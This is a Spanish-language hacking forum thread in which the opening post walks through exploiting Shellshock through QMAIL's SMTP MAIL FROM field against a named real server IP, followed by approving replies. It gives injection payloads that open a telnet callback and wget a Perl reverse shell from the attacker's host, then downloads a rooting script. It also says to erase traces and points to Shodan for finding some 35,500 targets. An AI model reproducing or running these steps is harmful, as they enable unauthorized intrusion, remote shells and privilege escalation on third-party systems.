Explotar Shellshock en smtp QMAIL

Iniciado por Muppet, Octubre 02, 2014, 12:40:27 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 02, 2014, 12:40:27 AM Ultima modificación: Octubre 02, 2014, 01:00:34 AM por hdbreaker
ShellShock Exploit PoC

Bueno antes que nada le agradezco a hielasangre por sacarme el bloqueo :P

Como he leido mucho de shellshock y nada sobre como explotarlo, les dejo un pequeño tutorial de como explotarlo un poco más allá que en los clasicos user-agent (que siendo realista muy pocos servidores utlizán cgi-scripts y menos hechos en bash)

Esto afecta a los servidores smtp de QMAIL por no validar correctamente el encabezado FROM MAIL:<> permitiendo ingresar como email cualquier string,
nosotros aprovecharemos esto para lograr ejecutar nuestro codigo arbitrario con la ayuda de shellshock

Para el PoC use este servidor que encontre vulnerable: 200.80.35.42

Empezamos!

1) Dejamos a la escucha el puerto donde queremos recibir la conexión entrante:

nc -vv -l -p 9669



2) Nos conectamos al servidor smtp y realizamos el ataque

nc -vv 200.80.35.42 25

Entablamos toda la negociación necesaria con el servidor SMTP, esto consta de 4 pasos

.helo me (Le comunicamos al servidor que necesitamos usar su servicio)
.mail from:<[email protected]> (establecemos la dirección de email remitente) ---> ACÁ INYECTAMOS NUESTRO CODIGO SHELLSHOCK
rcpt to: <> ([email protected]) (establecemos la direccion del receptor del mensaje)
data (Comenzamos a escribir el email)
Subject: Titulo. (Establecemos el titulo del mensaje y lo terminamos con un .)
Mensaje. (Escribimos el mensaje terminado con un .)

FIN (Esperamos que se complete el proceso)

(Para mas info de SMTP visitar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta )

Bueno como mas arriba dije el error radica en que QMAIL no valida que lo ingresado en MAIL FROM sea un email
entonces en mi caso inyecto el siguiente payload shellshock:

() { :;}; /usr/bin/telnet No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 9669

Al terminar el proceso de QMAIL deberia ejecutar el codigo arbitrario inyectado en la variable global de la función de shellshock y devolvernos una conexion entrante a nuestro puerto a la escucha



Esto significa q con un poco de conocimiento hemos logrado ejecutar codigo arbitrario en el servidor mediante un servidor vulnerable explotando un error de validación de SMTP, en este simple PoC me devolví una conexión telnet, pero podriamos jugar con los comandos para subir un reverse shell y ganar acceso al sistema, veamos como!

Esta vez vamos a ejecutar codigo arbitrario para descargarnos de nuestro servidor web un reverse shell en perl

Payload:

() { :;}; /usr/bin/wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:8080/rsh.perl



esperamos un tiempo considerable para asegurarnos la descarga de nuestro script, ponemos a escuchar nuevamente nc



y ejecutamos nuestro archivo perl

() { :;}; /usr/bin/perl rsh.perl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 9669 -l



y ahora tenemos acceso al sistema! JA! si indagamos un poco y largamos un whoami! vemos que es un kernel 2.6



Intentemos rootearlo, yo en mi caso use un AutoRoot en perl que encontre por internet.

wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:8081/AutoRoot.pl



Pasemos a ver si tenemos suerte!

Ejecutamos los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y vemos q sucede (yo en mi caso moví ambos archivos a otra carpeta)

perl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y esperamos!

En este caso no hemos tenido suerte, lo que no descarta que buscando un poco podamos hacer un rooteo manual del servidor :P (De hecho ya lo hice)
pero eso quedara para otro tutorial! (Estoy haciendo el tutorial mientras realizo la intrusión)



No nos olvidemos de borrar todas nuestras huellas!

Y despues de esto preguntaran, cuantos sitios vulnerables a shellshock existen, bueno yo me ayude un poco de mi amigo SHODAN



35500 posibles target vulnerables solo por QMAIL SMTP!!! Saludos

Happy Haking[/color]

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Parece que borraron el botón de responder...

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Gracias a vos loquin! vos me hiciste ver por encima de la pared!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Gran tutorial, hdbreaker, te puse +1, me ha encantado
Contacto: @migueljimeno96 -

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gran tutorial, hdbreaker, te puse +1, me ha encantado

jajja gracias!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Gracias a vos loquin! vos me hiciste ver por encima de la pared!

Que cariño y respeto por no decir amor :D ..

Ya enserio lo vi anoche la entrada pero por vago no comente, ni hice mi prueba xD pero tras hacerla :| me quede asi con la careta, excelente aporte hd igual para ti hiela.

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Excelente aporte, la verdad es que no pensaba que podría ser tan fácil conseguir acceso de esa manera.

Un saludo.



Terrible post brother! con dhcp tmb se puede explotar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta saludos!
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No, te fuiste al carajo. Haces q mis post no sean más q ridiculeces 

Muchas gracias por compartir!

Saludos!
WhiZ